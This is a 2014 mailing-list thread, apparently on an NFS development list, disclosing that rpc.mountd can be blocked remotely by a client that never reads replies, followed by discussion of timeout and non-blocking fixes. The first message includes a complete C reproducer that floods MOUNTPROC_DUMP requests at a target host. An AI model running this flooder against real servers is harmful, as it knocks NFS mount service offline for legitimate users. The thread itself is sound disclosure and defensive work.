Discussion:
rpc.mountd can be blocked by a bad client
Strösser, Bodo
2014-09-24 10:57:09 UTC
Hello,

a few days ago we had some trouble with an NFS server. Most of the time the clients could no
longer mount any shares, but in rare cases they succeeded.

We found out that during the times when mounts failed, rpc.mountd hung on a write() to a TCP
socket. netstat showed that Send-Q was full and Recv-Q counted up slowly. After a long time
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a short
while until it hung on write() again for the same reason. The problem was caused by a wrongly
configured MTU size. So a single bad client (or as many clients as the number of threads used
by rpc.mountd) can block rpc.mountd entirely.

But what happens if someone intentionally sends RPC requests but doesn't read() the
answers? I wrote a small tool to test this situation. It fires DUMP requests at rpc.mountd as
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests, and no
TCP timeout breaks up this situation.
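
For illustration, a stripped-down sketch of such a tool (not my exact code; the target host
and the mountd TCP port are assumed to be given on the command line) could look like this:

/* Hypothetical reproducer sketch: floods rpc.mountd with MOUNTPROC_DUMP
 * calls over TCP without ever reading the replies, so the server's
 * Send-Q fills up and its write() blocks.
 * Usage: ./flood <ipv4-addr> <mountd-tcp-port>
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	struct sockaddr_in sin;
	uint32_t msg[11];
	int fd;

	if (argc != 3) {
		fprintf(stderr, "usage: %s <host> <mountd-tcp-port>\n", argv[0]);
		return 1;
	}

	fd = socket(AF_INET, SOCK_STREAM, 0);
	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_port = htons(atoi(argv[2]));
	inet_pton(AF_INET, argv[1], &sin.sin_addr);
	if (fd < 0 || connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
		perror("connect");
		return 1;
	}

	/* ONC RPC call for MOUNTPROC_DUMP (prog 100005, vers 3, proc 2),
	 * AUTH_NONE, no arguments: 10 words, preceded by the TCP record
	 * mark ("last fragment" bit | length). */
	msg[0] = htonl(0x80000000 | 40);
	msg[2] = htonl(0);		/* msg_type = CALL */
	msg[3] = htonl(2);		/* RPC version 2 */
	msg[4] = htonl(100005);		/* MOUNT program */
	msg[5] = htonl(3);		/* MOUNT version 3 */
	msg[6] = htonl(2);		/* MOUNTPROC_DUMP */
	msg[7] = msg[8] = htonl(0);	/* cred: AUTH_NONE, length 0 */
	msg[9] = msg[10] = htonl(0);	/* verf: AUTH_NONE, length 0 */

	for (uint32_t xid = 1; ; xid++) {
		msg[1] = htonl(xid);	/* fresh xid for every call */
		/* fire requests as fast as possible, never read() a reply */
		if (write(fd, msg, sizeof(msg)) < 0) {
			perror("write");
			break;
		}
	}
	close(fd);
	return 0;
}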

So it's quite easy to intentionally block rpc.mountd remotely.

Please CC me, I'm not on the list.

Best regards,
Bodo
NeilBrown
2014-09-25 00:32:10 UTC
On Wed, 24 Sep 2014 12:57:09 +0200 "Strösser, Bodo" wrote:
Post by Strösser, Bodo
Hello,
a few days ago we had some trouble with an NFS server. Most of the time the clients could no
longer mount any shares, but in rare cases they succeeded.
We found out that during the times when mounts failed, rpc.mountd hung on a write() to a TCP
socket. netstat showed that Send-Q was full and Recv-Q counted up slowly. After a long time
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a short
while until it hung on write() again for the same reason. The problem was caused by a wrongly
configured MTU size. So a single bad client (or as many clients as the number of threads used
by rpc.mountd) can block rpc.mountd entirely.
But what happens if someone intentionally sends RPC requests but doesn't read() the
answers? I wrote a small tool to test this situation. It fires DUMP requests at rpc.mountd as
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests, and no
TCP timeout breaks up this situation.
So it's quite easy to intentionally block rpc.mountd remotely.
That's rather nasty.
We could possibly set the socket to be non-blocking, or we could set an alarm
just before handling a request.
Probably rpc_dispatch() in support/nfs/rpcdispatch.c would be the best place
to put the timeout.
catch SIGALRM (don't set SA_RESTART)
alarm(10);
call svc_sendreply
alarm(0);

if the alarm fires while svc_sendreply is writing to the socket it should get
an error and close the connection.
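
Roughly, and untested, something like the following (the helper name and the 10 second
value are only for illustration):

/* A minimal sketch of the alarm() approach, assuming it would be wrapped
 * around the svc_sendreply() call in the dispatch routine. */
#include <rpc/rpc.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>

static void reply_timeout(int sig)
{
	/* Empty handler: its only job is to make a blocked write()
	 * return EINTR.  SA_RESTART must not be set, or the write()
	 * would simply be restarted after the signal. */
	(void)sig;
}

void install_reply_timeout(void)
{
	struct sigaction sa;

	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = reply_timeout;
	sa.sa_flags = 0;			/* deliberately no SA_RESTART */
	sigemptyset(&sa.sa_mask);
	sigaction(SIGALRM, &sa, NULL);
}

/* Hypothetical wrapper: send the reply, but give up after 10 seconds
 * if the client does not drain its end of the socket. */
bool_t send_reply_with_timeout(SVCXPRT *transp, xdrproc_t xdr_res, void *res)
{
	bool_t ok;

	alarm(10);
	ok = svc_sendreply(transp, xdr_res, res);
	alarm(0);
	return ok;
}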

This would only fix mountd (as it is the only process to use rpc_dispatch).
Is a similar thing needed for statd I wonder?? It isn't so important.

NeilBrown
Post by Strösser, Bodo
Please CC me, I'm not on the list.
Best regards,
Bodo
Strösser, Bodo
2014-09-25 10:21:57 UTC
-----Original Message-----
Sent: Thursday, September 25, 2014 2:32 AM
To: Strösser, Bodo
Subject: Re: rpc.mountd can be blocked by a bad client
On Wed, 24 Sep 2014 12:57:09 +0200 "Strösser, Bodo" wrote:
Post by Strösser, Bodo
Hello,
a few days ago we had some trouble with an NFS server. Most of the time the clients could no
longer mount any shares, but in rare cases they succeeded.
We found out that during the times when mounts failed, rpc.mountd hung on a write() to a TCP
socket. netstat showed that Send-Q was full and Recv-Q counted up slowly. After a long time
the write ended with an error ("TCP timeout" IIRC) and rpc.mountd worked normally for a short
while until it hung on write() again for the same reason. The problem was caused by a wrongly
configured MTU size. So a single bad client (or as many clients as the number of threads used
by rpc.mountd) can block rpc.mountd entirely.
But what happens if someone intentionally sends RPC requests but doesn't read() the
answers? I wrote a small tool to test this situation. It fires DUMP requests at rpc.mountd as
fast as possible, but does not read from the socket. The result is the same as with the
problem above: rpc.mountd hangs in write() and no longer responds to other requests, and no
TCP timeout breaks up this situation.
So it's quite easy to intentionally block rpc.mountd remotely.
That's rather nasty.
We could possibly set the socket to be non-blocking, or we could set an alarm
just before handling a request.
Probably rpc_dispatch() in support/nfs/rpcdispatch.c would be the best place
to put the timeout.
catch SIGALRM (don't set SA_RESTART)
alarm(10);
call svc_sendreply
alarm(0);
I also thought about changing the socket to non-blocking. But I'm not sure: can RPC replies
be so big that they don't fit into the socket buffer? If so, write() would put the first
part into the buffer, and a second write() for the rest would fail, as the first part
probably hasn't been acked yet, right?
So non-blocking needs to be combined with handling of buffer-full situations, I guess. Such
handling, together with a timeout for starving connections, would be a clean solution.
To do that, one would have to replace the TCP write routine of the RPC library, i.e. change
the xdrs's pointer to the write function. I don't know whether that can be done in a
portable way that works on the different platforms.
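
Just to sketch what I have in mind (the function name and the 10 second value are made up;
this is of course not the existing libtirpc code): a replacement write routine for a
non-blocking connection socket could retry partial writes via poll(), but give up on a
connection that stays unwritable for too long.

#include <errno.h>
#include <poll.h>
#include <time.h>
#include <unistd.h>

#define REPLY_TIMEOUT_MS 10000		/* illustrative per-reply budget */

static long elapsed_ms(const struct timespec *start)
{
	struct timespec now;

	clock_gettime(CLOCK_MONOTONIC, &now);
	return (now.tv_sec - start->tv_sec) * 1000 +
	       (now.tv_nsec - start->tv_nsec) / 1000000;
}

/* Returns the number of bytes written, or -1 if the client does not
 * drain its receive buffer in time (caller would drop the connection). */
ssize_t write_with_deadline(int fd, const char *buf, size_t len)
{
	struct timespec start;
	size_t done = 0;

	clock_gettime(CLOCK_MONOTONIC, &start);
	while (done < len) {
		ssize_t n = write(fd, buf + done, len - done);

		if (n > 0) {
			done += n;
			continue;
		}
		if (n < 0 && errno != EAGAIN && errno != EWOULDBLOCK && errno != EINTR)
			return -1;		/* real error */

		/* Send buffer full: wait for writability, but only for
		 * whatever is left of the per-reply budget, so a starving
		 * client cannot block us forever. */
		long left = REPLY_TIMEOUT_MS - elapsed_ms(&start);
		if (left <= 0)
			return -1;		/* starving client, give up */
		struct pollfd pfd = { .fd = fd, .events = POLLOUT };
		if (poll(&pfd, 1, (int)left) < 0 && errno != EINTR)
			return -1;
	}
	return (ssize_t)done;
}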

About setting an alarm timeout: I'm not sure that rpc_dispatch() is the right place for it.
mountd uses mount_dispatch(), which has an exit path via svcerr_auth() that also sends a
reply. So the timeout you suggest should be inserted in mount_dispatch(), I think.
OTOH, a timeout will shorten the hang, but bad clients can still slow mountd down
extremely.

BTW: AFAICS on Linux with libtirpc, using the SVCGET_CONNMAXREC control, the socket can
indirectly be set to non-blocking. That seems to result in write_vc() looping over write()
for at most 2 seconds before giving up.

One other point: AFAICS on Linux with libtirpc the listening socket of mountd is
in blocking mode. Would that be a problem when running multiple "threads"?
The comment in svc_socket.c/svc_socket(), where the listening socket is set to
non-blocking, sounds very reasonable. But AFAICS if libtirpc is used, O_NONBLOCK
currently isn't set.
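
For reference, what I mean is a plain fcntl() call like the following (a minimal
illustration, not the actual svc_socket.c or libtirpc code):

#include <fcntl.h>

/* Put a socket (e.g. the listening socket) into non-blocking mode. */
static int set_nonblocking(int fd)
{
	int flags = fcntl(fd, F_GETFL, 0);

	if (flags < 0)
		return -1;
	return fcntl(fd, F_SETFL, flags | O_NONBLOCK);
}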

Bodo Stroesser
if the alarm fires while svc_sendreply is writing to the socket it should get
an error and close the connection.
This would only fix mountd (as it is the only process to use rpc_dispatch).
Is a similar thing needed for statd I wonder?? It isn't so important.
NeilBrown
Post by Strösser, Bodo
Please CC me, I'm not on the list.
Best regards,
Bodo